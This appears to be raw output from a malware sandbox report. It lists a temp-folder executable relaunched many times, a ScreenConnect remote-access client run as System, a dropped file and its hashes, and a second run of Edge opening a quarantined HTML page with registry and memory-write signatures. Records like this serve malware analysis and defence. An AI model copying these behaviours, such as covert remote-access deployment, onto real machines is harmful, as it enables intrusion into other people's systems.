C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe" "RunRole" "da69f030-b390-4777-8cdc-e0bc9ce7c1c3" "System"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

Network

Files


memory/1284-1194-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/1284-1193-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/130484-1195-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/130148-1209-0x0000000000400000-0x000000000087F000-memory.dmp

memory/130484-1211-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/106220-1212-0x0000000006F40000-0x00000000073BF000-memory.dmp

memory/106220-1213-0x0000000006F40000-0x00000000073BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036500101\cb4d3138f3.exe

MD5 c0de6fd5072e5af19dc57d131b1b0138
SHA1 d8680c639b0f2bd288c61896a9dfce9f1b49bc56
SHA256 9e74ed79de88b2c8aedc0578e3c8cf96ffb908d72a641a72205de6c2a766aaa4
SHA512 60cf165679f2103c2945dcf8a3ddbeca604556c62c2f5821c1f11175aaf44c3b4896542b6c5f25f7dceb29d0959d6f71b578748111522d1fd1021758f6ae9e77

memory/1284-1224-0x0000000004B10000-0x0000000004E14000-memory.dmp

memory/1284-1226-0x0000000004B10000-0x0000000004E14000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

MD5 553d656bda8c682f6ce6154b6f716e83
SHA1 489327ddf034760449b7b1304ca4cb937e8f9a6a
SHA256 ca6fc95a52a06b42f8093bccac4277b432eeed97eb3717213fefa1dd57a713e8
SHA512 f68f055d2aab20be3ed438e93ed60adfef07f7cf8c2951a88a7dd8a7b73919f61a673db1fc498f830b3096dba2347784f2629c4028662f80e0b2a4879f008452

Analysis: behavioral19

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1504 wrote to memory of 4964 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 2500 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1504 wrote to memory of 3952 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd985346f8,0x7ffd98534708,0x7ffd98534718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,16511908646446146674,12019144910725962583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

